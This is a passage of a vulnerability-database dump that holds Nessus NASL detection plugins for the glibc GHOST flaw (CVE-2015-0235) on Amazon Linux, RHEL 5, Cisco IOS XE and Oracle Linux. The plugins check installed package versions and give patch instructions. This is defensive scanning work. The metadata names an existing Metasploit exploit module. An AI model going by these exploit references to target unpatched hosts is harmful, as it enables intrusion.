Running 'yum clean all' followed by 'yum update glibc' will\ninstall the fixed package, and you should reboot your instance after\ninstalling the update.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, the same\n'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all'\nfollowed by 'yum update glibc' will install the fixed package, and you\nshould reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 repositories,\n'glibc-2.12-1.149.49.amzn1' addresses the CVE. Running 'yum clean all'\nfollowed by 'yum update glibc' will install the fixed package, and you\nshould reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.03, 2012.09, 2012.03, or\n2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.09 update glibc' to install the updated glibc\npackage. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a\nversion of the Amazon Linux AMI that was part of our public beta, and\nwe encourage you to move to a newer version of the Amazon Linux AMI as\nsoon as possible.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-473.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update glibc' to update your system. Note that you may need\nto run 'yum clean all' first. Once this update has been applied,\n'reboot your instance to ensure that all processes and daemons that\nlink against glibc are using the updated version'. 
On new instance\nlaunches, you should still reboot after cloud-init has automatically\napplied this update.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 
2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\n# Checks for below glibc-2.17\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.17-0.0.amzn1\"))\n{\n # Clean out initial report from first check\n __rpm_report = '';\n if (rpm_check(release:\"ALA\", reference:\"glibc-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-common-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-static-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"nscd-2.12-1.149.49.amzn1\")) flag++;\n}\nelse\n{\n # Checks for glibc-2.17\n # Clean out initial report from first check\n __rpm_report = '';\n if (rpm_check(release:\"ALA\", reference:\"glibc-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-common-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.17-55.93.amzn1\")) 
flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-static-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"nscd-2.17-55.93.amzn1\")) flag++;\n}\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:29", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "RHEL 5 : glibc (RHSA-2015:0090) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/nessus/81033", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0090. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81033);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2015:0090) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0090\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-debuginfo-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:52:39", "description": "The remote Cisco device is running a version of Cisco IOS XE software that is potentially affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validated user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. 
This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\nNote that this issue only affects those IOS XE instances that are running as a 'Nova' device, and thus, if the remote IOS XE instance is not running as a 'Nova' device, consider this a false positive.", "cvss3": {}, "published": "2015-03-02T00:00:00", "type": "nessus", "title": "Cisco IOS XE GNU GNU C Library (glibc) Buffer Overflow (CSCus69731) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/o:cisco:ios_xe"], "id": "CISCO-SA-20150128-GHOST-IOSXE_NOVA.NASL", "href": "https://www.tenable.com/plugins/nessus/81595", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81595);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69731\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco IOS XE GNU GNU C Library (glibc) Buffer Overflow (CSCus69731) (GHOST)\");\n script_summary(english:\"Checks IOS XE version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security 
patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Cisco device is running a version of Cisco IOS XE software\nthat is potentially affected by a heap-based buffer overflow\nvulnerability in the GNU C Library (glibc) due to improperly\nvalidated user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\n\nNote that this issue only affects those IOS XE instances that are\nrunning as a 'Nova' device, and thus, if the remote IOS XE instance\nis not running as a 'Nova' device, consider this a false positive.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69731\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco bug ID CSCus69731.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/02\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios_xe\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_xe_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS-XE/Version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\n# Bug notes these are affected on 'Nova' devices\n# only.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS-XE/Version\");\n\n# Per Bug CSCus69731 (converted from IOS vers)\n# No model restrictions listed\n# Further note that IOS version '15.0(2)EX'\n# is not mapped and thus, omitted.\nif (\n version == \"3.1.0SG\" ||\n version == \"3.2.0SE\" ||\n version == \"3.2.0SG\" ||\n version == \"3.2.0XO\" ||\n version == \"3.3.0SE\" ||\n version == \"3.3.0XO\" ||\n version == \"3.4.0SG\" ||\n version == \"3.5.0E\" ||\n version == \"3.6.0E\" ||\n version == \"3.7.0E\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : CSCus69731' +\n '\\n Installed release : ' + version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(port:0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:50", "description": "From Red Hat Security Advisory 2015:0090 :\n\nUpdated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : glibc (ELSA-2015-0090) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:glibc", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/nessus/81044", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0090 and \n# Oracle Linux Security Advisory ELSA-2015-0090 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81044);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"Oracle Linux 5 : glibc (ELSA-2015-0090) (GHOST)\");\n script_summary(english:\"Checks rpm output for the 
updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0090 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004811.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
